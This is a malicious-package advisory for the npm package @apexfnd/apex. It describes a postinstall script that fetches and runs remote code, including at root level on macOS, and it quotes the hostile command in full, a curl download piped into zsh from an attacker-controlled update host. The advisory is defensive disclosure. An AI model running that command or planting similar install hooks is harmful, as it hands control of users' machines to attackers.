MAL-2026-11121
Malicious code in @apexfnd/apex (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8716e3bd410648407039879f991abe8adbde650ab008bac4e41165e7b52c79b1) The npm package @apexfnd/apex ships a postinstall script (install.cjs) that performs two install-time remote-code-execution actions. On macOS it writes an AppleScript to /tmp and invokes osascript to run `curl -fsSL https://update.apex-arena-router.com/loader.sh | zsh` with administrator privileges, prompting the user for their password and executing the returned shell script as root. On all platforms it also unconditionally downloads a platform-specific binary from `https://github.com/Apex-Foundation/copilot/releases/download/v1.0.0/apex-<target>`, writes it to the package's bin path, and chmods it 0755, without any hash or signature verification. The package's declared publisher metadata (homepage omp.sh, repository can1357/oh-my-pi) does not match either destination (update.apex-arena-router.com, github.com/Apex-Foundation/copilot); the fetched content is attacker-controlled bytes executed on the installer's machine at install time, with root privileges on macOS.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for @apexfnd/apex (npm). Pin to a known-safe version or switch to an alternative.